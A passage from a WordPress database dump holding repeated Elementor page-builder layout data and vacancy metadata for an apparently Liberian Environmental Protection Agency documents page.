documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"586692a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"985f7d7\"}]},\"elements\":[{\"id\":\"ecb96e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30088,4202,'_elementor_pro_version','3.3.6'),(30091,3053,'_last_editor_used_jetpack','classic-editor'),(30092,4204,'_elementor_edit_mode','builder'),(30093,4204,'_elementor_template_type','wp-page'),(30094,4204,'_elementor_version','3.4.1'),(30095,4204,'_wp_page_template','default'),(30096,4204,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"586692a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"985f7d7\"}]},\"elements\":[{\"id\":\"ecb96e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30098,4204,'_elementor_pro_version','3.3.6'),(30100,4205,'_elementor_edit_mode','builder'),(30101,4205,'_elementor_template_type','wp-page'),(30102,4205,'_elementor_version','3.4.1'),(30103,4205,'_wp_page_template','default'),(30104,4205,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"586692a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"985f7d7\"}]},\"elements\":[{\"id\":\"ecb96e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30106,4205,'_elementor_pro_version','3.3.6'),(30108,4206,'_elementor_edit_mode','builder'),(30109,4206,'_elementor_template_type','wp-page'),(30110,4206,'_elementor_version','3.4.1'),(30111,4206,'_wp_page_template','default'),(30112,4206,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"586692a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"985f7d7\"}]},\"elements\":[{\"id\":\"ecb96e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30114,4206,'_elementor_pro_version','3.3.6'),(30117,3053,'_wp_page_template','default'),(30118,3053,'closed_date','2020-06-12'),(30119,3053,'owner','Environmental Protection Agency'),(30120,3053,'vacancy_link','https://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf'),(30122,3051,'_wp_page_template','default'),(30123,3051,'closed_date','2020-06-12'),(30124,3051,'owner','Environmental Protection Agency'),(30125,3051,'vacancy_link','https://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf'),(30126,2971,'_last_editor_used_jetpack','classic-editor'),(30158,4215,'_elementor_edit_mode','builder'),(30159,4215,'_elementor_template_type','wp-page'),(30160,4215,'_elementor_version','3.4.1'),(30161,4215,'_wp_page_template','default'),(30162,4215,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related 